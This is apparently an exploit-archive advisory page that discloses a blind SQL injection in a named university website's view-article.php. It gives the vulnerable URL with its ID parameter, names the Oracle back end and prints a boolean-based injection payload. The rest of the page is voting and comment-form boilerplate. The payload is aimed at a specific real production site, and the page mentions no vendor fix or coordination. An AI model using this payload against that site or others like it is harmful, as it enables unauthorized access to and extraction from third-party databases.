Aburaihan Campus Univercity Of Tehran Sql injection Vulnerability

2018.01.30

IRANIAN ETHICAL HACKERS (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

﻿[+] Exploit Title ; Aburaihan Campus Univercity Of Tehran Sql injection Vulnerability

[+] Date : 2018-01-30

[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS

[+] Vendor Homepage : http://abu.ut.ac.ir/

[+] Dork : N/A

[+] Tested On : windows 10 - kali linux 2.0

[+] Contact : https://telegram.me/WebServer

[+] poc :

	[!] Vulnerable File : view-article.php

	[!] Type :

		Parameter: ID (GET)
    		Type: boolean-based blind
    		Title: AND boolean-based blind - WHERE or HAVING clause
    		Payload: ID=22') AND 2939=2939 AND ('lcbs'='lcbs

	[!] back-end DBMS : Oracle

	[!] Vulnerability Url : 
		
		[!] http://abu.ut.ac.ir/pages/view-article.php?ID=22

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Aburaihan Campus Univercity Of Tehran Sql injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.